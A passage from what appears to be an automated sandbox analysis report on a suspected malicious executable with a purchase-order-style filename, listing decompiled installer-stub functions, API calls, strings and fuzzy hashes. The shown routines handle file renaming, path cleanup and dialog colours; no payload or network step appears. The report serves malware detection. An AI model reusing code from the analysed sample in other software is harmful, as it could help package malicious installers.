							_t47 = GlobalAlloc(0x40, _t43 + _t6);
							if(_t47 == 0 || E00405A1A(_t49, _t47, _t43) == 0) {
								L18:
								return CloseHandle(_t49);
							} else {
								if(E00405907(_t39, _t47, "[Rename]\r\n") != 0) {
									_t50 = E00405907(_t39, _t22 + 0xa, 0x4093b0);
									if(_t50 == 0) {
										_t49 =  *(_t54 + 0x18);
										L16:
										_t25 = _t43;
										L17:
										E0040595D(_t25 + _t47, 0x42b1f8, _t38);
										SetFilePointer(_t49, 0, 0, 0);
										E00405A49(_t49, _t47, _t43 + _t38);
										GlobalFree(_t47);
										goto L18;
									}
									_t40 = _t47 + _t43;
									_t32 = _t40 + _t38;
									while(_t40 > _t50) {
										 *_t32 =  *_t40;
										_t32 = _t32 - 1;
										_t40 = _t40 - 1;
									}
									_t25 = _t50 - _t47 + 1;
									_t49 =  *(_t54 + 0x18);
									goto L17;
								}
								lstrcpyA(_t47 + _t43, "[Rename]\r\n");
								_t43 = _t43 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E004059A2(_t45, 0, "true"));
					_t13 = GetShortPathNameA(_t45, 0x42b5f8, 0x400);
					if(_t13 != 0 && _t13 <= 0x400) {
						goto L3;
					}
				}
				return _t13;
			}



















                                                                                                                                                                                  0x00405a78
                                                                                                                                                                                  0x00405a87
                                                                                                                                                                                  0x00405a8d
                                                                                                                                                                                  0x00405a9e
                                                                                                                                                                                  0x00405ac6
                                                                                                                                                                                  0x00405ad1
                                                                                                                                                                                  0x00405ad5
                                                                                                                                                                                  0x00405af5
                                                                                                                                                                                  0x00405afc
                                                                                                                                                                                  0x00405b06
                                                                                                                                                                                  0x00405b13
                                                                                                                                                                                  0x00405b18
                                                                                                                                                                                  0x00405b1d
                                                                                                                                                                                  0x00405b21
                                                                                                                                                                                  0x00405b30
                                                                                                                                                                                  0x00405b32
                                                                                                                                                                                  0x00405b3f
                                                                                                                                                                                  0x00405b43
                                                                                                                                                                                  0x00405bde
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405b59
                                                                                                                                                                                  0x00405b66
                                                                                                                                                                                  0x00405b8a
                                                                                                                                                                                  0x00405b8e
                                                                                                                                                                                  0x00405bad
                                                                                                                                                                                  0x00405bb1
                                                                                                                                                                                  0x00405bb1
                                                                                                                                                                                  0x00405bb3
                                                                                                                                                                                  0x00405bbc
                                                                                                                                                                                  0x00405bc7
                                                                                                                                                                                  0x00405bd2
                                                                                                                                                                                  0x00405bd8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405bd8
                                                                                                                                                                                  0x00405b90
                                                                                                                                                                                  0x00405b93
                                                                                                                                                                                  0x00405b9e
                                                                                                                                                                                  0x00405b9a
                                                                                                                                                                                  0x00405b9c
                                                                                                                                                                                  0x00405b9d
                                                                                                                                                                                  0x00405b9d
                                                                                                                                                                                  0x00405ba5
                                                                                                                                                                                  0x00405ba7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405ba7
                                                                                                                                                                                  0x00405b71
                                                                                                                                                                                  0x00405b77
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405b77
                                                                                                                                                                                  0x00405b43
                                                                                                                                                                                  0x00405b21
                                                                                                                                                                                  0x00405aa0
                                                                                                                                                                                  0x00405aab
                                                                                                                                                                                  0x00405ab4
                                                                                                                                                                                  0x00405ab8
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405ab8
                                                                                                                                                                                  0x00405be9

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • lstrcpyA.KERNEL32(0042B5F8,NUL,?,00000000,?,00000000,00405C0B,?,?), ref: 00405A87
                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,00405C0B,?,?), ref: 00405AAB
                                                                                                                                                                                  • GetShortPathNameA.KERNEL32(?,0042B5F8,00000400), ref: 00405AB4
                                                                                                                                                                                    • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                                                                                                                    • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                                                                                                                                  • GetShortPathNameA.KERNEL32(0042B9F8,0042B9F8,00000400), ref: 00405AD1
                                                                                                                                                                                  • wsprintfA.USER32 ref: 00405AEF
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,0042B9F8,C0000000,00000004,0042B9F8,?,?,?,?,?), ref: 00405B2A
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B39
                                                                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B71
                                                                                                                                                                                  • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0042B1F8,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BC7
                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405BD8
                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BDF
                                                                                                                                                                                    • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe,80000000,00000003), ref: 004059A6
                                                                                                                                                                                    • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 004059C8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                                                                  • String ID: %s=%s$NUL$[Rename]
                                                                                                                                                                                  • API String ID: 222337774-4148678300
                                                                                                                                                                                  • Opcode ID: bf779c124455d02b5047b2f19edd63a8f4b66244a15a9c2ac20d4885825cd380
                                                                                                                                                                                  • Instruction ID: 8a014ae25a2f57f4e7f496887e8afb480c0f68f452f449b39f33bde68a4ee9be
                                                                                                                                                                                  • Opcode Fuzzy Hash: bf779c124455d02b5047b2f19edd63a8f4b66244a15a9c2ac20d4885825cd380
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5231F370604B19ABC2206B615D49F6B3A6CDF45758F14053AFE01F62D2DA7CB800CEAD
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00405F9A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E00405F9A(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E0040580E(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004057CC("*?|<>/\":", _t5))) == 0) {
							E0040595D(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                                                                                                  0x00405f9c
                                                                                                                                                                                  0x00405fa4
                                                                                                                                                                                  0x00405fb8
                                                                                                                                                                                  0x00405fb8
                                                                                                                                                                                  0x00405fbe
                                                                                                                                                                                  0x00405fcb
                                                                                                                                                                                  0x00405fcb
                                                                                                                                                                                  0x00405fcc
                                                                                                                                                                                  0x00405fce
                                                                                                                                                                                  0x00405fd2
                                                                                                                                                                                  0x00405fd4
                                                                                                                                                                                  0x00405fdd
                                                                                                                                                                                  0x00405fdf
                                                                                                                                                                                  0x00405ff9
                                                                                                                                                                                  0x00406001
                                                                                                                                                                                  0x00406001
                                                                                                                                                                                  0x00406006
                                                                                                                                                                                  0x00406008
                                                                                                                                                                                  0x0040600a
                                                                                                                                                                                  0x0040600e
                                                                                                                                                                                  0x0040600f
                                                                                                                                                                                  0x00406012
                                                                                                                                                                                  0x0040601a
                                                                                                                                                                                  0x0040601c
                                                                                                                                                                                  0x00406020
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00406026
                                                                                                                                                                                  0x0040602b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040602b
                                                                                                                                                                                  0x00406030

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe",762C3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                                                                                                                                  • CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                                                                                                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe",762C3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                                                                                                                                  • CharPrevA.USER32(?,?,762C3410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • "C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe", xrefs: 00405FD6
                                                                                                                                                                                  • *?|<>/":, xrefs: 00405FE2
                                                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F9B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                                                                  • String ID: "C:\Users\user\Desktop\RFQINL0607_Commerical_list.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                  • API String ID: 589700163-698478666
                                                                                                                                                                                  • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                                                                                                                  • Instruction ID: 57e0f34d942670e43035b7c22e392f1a12bb14715b301cf1348a0c798ab9ef07
                                                                                                                                                                                  • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B112751809B932AFB3256244C00B7BBFD88F57760F19007BE8D5722C2D67C5D529B6D
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00403F7B Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E00403F7B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                                                                                                                                  0x00403f8d
                                                                                                                                                                                  0x00404021
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404021
                                                                                                                                                                                  0x00403f9e
                                                                                                                                                                                  0x00403fa2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403fa8
                                                                                                                                                                                  0x00403fb1
                                                                                                                                                                                  0x00403fb4
                                                                                                                                                                                  0x00403fb4
                                                                                                                                                                                  0x00403fba
                                                                                                                                                                                  0x00403fc0
                                                                                                                                                                                  0x00403fc0
                                                                                                                                                                                  0x00403fcc
                                                                                                                                                                                  0x00403fd2
                                                                                                                                                                                  0x00403fd9
                                                                                                                                                                                  0x00403fdc
                                                                                                                                                                                  0x00403fdf
                                                                                                                                                                                  0x00403fe1
                                                                                                                                                                                  0x00403fe1
                                                                                                                                                                                  0x00403fe9
                                                                                                                                                                                  0x00403fef
                                                                                                                                                                                  0x00403fef
                                                                                                                                                                                  0x00403ff9
                                                                                                                                                                                  0x00403ffe
                                                                                                                                                                                  0x00404001
                                                                                                                                                                                  0x00404006
                                                                                                                                                                                  0x00404009
                                                                                                                                                                                  0x00404009
                                                                                                                                                                                  0x00404019
                                                                                                                                                                                  0x00404019
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000EB), ref: 00403F98
                                                                                                                                                                                  • GetSysColor.USER32(00000000), ref: 00403FB4
                                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00403FC0
                                                                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 00403FCC
                                                                                                                                                                                  • GetSysColor.USER32(?), ref: 00403FDF
                                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00403FEF
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00404009
                                                                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 00404013
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                                                                  • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                                                                                                                  • Instruction ID: f3431a0ddd372d44177634c3e6640760e16b4c563197d04d055afd4279a4596b
                                                                                                                                                                                  • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                                                                                                                  • Instruction Fuzzy Hash: F4219F71808705ABCB209F78DD48A4BBBF8AF41704B048A2AE996F26E0C734E904CB55
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 100021FA Relevance: 10.6, APIs: 7, Instructions: 139memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                                  			E100021FA(void* __edx, intOrPtr _a4) {
				signed int _v4;
				void* _t36;
				signed int _t37;
				void* _t38;
				void* _t47;
				signed int* _t49;
				signed int* _t50;
				void* _t51;

				_v4 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t50 = (_v4 << 5) + _t9;
					_t36 = _t50[6];
					if(_t36 == 0) {
						goto L9;
					}
					_t47 = 0x1a;
					if(_t36 == _t47) {
						goto L9;
					}
					if(_t36 != 0xffffffff) {
						if(_t36 <= 0 || _t36 > 0x19) {
							_t50[6] = _t47;
						} else {
							_t36 = E100012AD(_t36 - 1);
							L10:
						}
						goto L11;
					} else {
						_t36 = E1000123B();
						L11:
						_t51 = _t36;
						_t13 =  &(_t50[2]); // 0x820
						_t49 = _t13;
						if(_t50[1] != 0xffffffff) {
						}
						_t37 =  *_t50;
						_t50[7] = _t50[7] & 0x00000000;
						if(_t37 > 7) {
							L27:
							_t38 = GlobalFree(_t51);
							if(_v4 == 0) {
								return _t38;
							}
							if(_v4 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v4 = _v4 + 1;
							} else {
								_v4 = _v4 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t37 * 4 +  &M10002380))) {
								case 0:
									 *_t49 =  *_t49 & 0x00000000;
									goto L27;
								case 1:
									__eax = E100012FE(__ebp);
									goto L20;
								case 2:
									 *__ebx = E100012FE(__ebp);
									 *((intOrPtr*)(__ebx + 4)) = __edx;
									goto L27;
								case 3:
									__eax = E10001224(__ebp);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebx = __eax;
									goto L27;
								case 4:
									 *0x1000405c =  *0x1000405c +  *0x1000405c;
									__edi = GlobalAlloc(0x40,  *0x1000405c +  *0x1000405c);
									 *0x1000405c = MultiByteToWideChar(0, 0, __ebp,  *0x1000405c, __edi,  *0x1000405c);
									if( *__esi != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebx = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebx = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if(lstrlenA(__ebp) > 0) {
										__eax = E100012FE(__ebp);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x1000405c;
									__esi = __esi +  *0x10004064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E10001429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t36 = E10001224(0x10004034);
					goto L10;
				}
			}











                                                                                                                                                                                  0x1000220e
                                                                                                                                                                                  0x10002212
                                                                                                                                                                                  0x1000221d
                                                                                                                                                                                  0x1000221d
                                                                                                                                                                                  0x10002224
                                                                                                                                                                                  0x10002229
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x1000222d
                                                                                                                                                                                  0x10002230
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10002235
                                                                                                                                                                                  0x10002240
                                                                                                                                                                                  0x10002250
                                                                                                                                                                                  0x10002247
                                                                                                                                                                                  0x10002249
                                                                                                                                                                                  0x1000225f
                                                                                                                                                                                  0x1000225f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10002237
                                                                                                                                                                                  0x10002237
                                                                                                                                                                                  0x10002260
                                                                                                                                                                                  0x10002264
                                                                                                                                                                                  0x10002266
                                                                                                                                                                                  0x10002266
                                                                                                                                                                                  0x10002269
                                                                                                                                                                                  0x10002269
                                                                                                                                                                                  0x10002271
                                                                                                                                                                                  0x10002273
                                                                                                                                                                                  0x1000227a
                                                                                                                                                                                  0x10002349
                                                                                                                                                                                  0x1000234a
                                                                                                                                                                                  0x10002355
                                                                                                                                                                                  0x1000237f
                                                                                                                                                                                  0x1000237f
                                                                                                                                                                                  0x10002365
                                                                                                                                                                                  0x10002371
                                                                                                                                                                                  0x10002367
                                                                                                                                                                                  0x10002367
                                                                                                                                                                                  0x10002367
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10002280
                                                                                                                                                                                  0x10002280
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10002287
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10002290
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x1000229e
                                                                                                                                                                                  0x100022a0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x100022a9
                                                                                                                                                                                  0x100022ae
                                                                                                                                                                                  0x100022b1
                                                                                                                                                                                  0x100022b2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x100022be
                                                                                                                                                                                  0x100022c9
                                                                                                                                                                                  0x100022d8
                                                                                                                                                                                  0x100022e1
                                                                                                                                                                                  0x10002303
                                                                                                                                                                                  0x10002306
                                                                                                                                                                                  0x100022e3
                                                                                                                                                                                  0x100022e7
                                                                                                                                                                                  0x100022ed
                                                                                                                                                                                  0x100022ee
                                                                                                                                                                                  0x100022f1
                                                                                                                                                                                  0x100022f2
                                                                                                                                                                                  0x100022f4
                                                                                                                                                                                  0x100022fb
                                                                                                                                                                                  0x100022fb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10002313
                                                                                                                                                                                  0x10002316
                                                                                                                                                                                  0x10002322
                                                                                                                                                                                  0x10002324
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10002327
                                                                                                                                                                                  0x1000232a
                                                                                                                                                                                  0x1000232b
                                                                                                                                                                                  0x10002332
                                                                                                                                                                                  0x10002339
                                                                                                                                                                                  0x1000233c
                                                                                                                                                                                  0x1000233e
                                                                                                                                                                                  0x10002341
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x10002280
                                                                                                                                                                                  0x1000227a
                                                                                                                                                                                  0x10002255
                                                                                                                                                                                  0x1000225a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x1000225a

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                                                                                                                                                                    • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                                                                                                                                                                  • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11531499304.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11531472460.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11531531886.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11531564017.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_10000000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3730416702-0
                                                                                                                                                                                  • Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                                                                                                                                  • Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
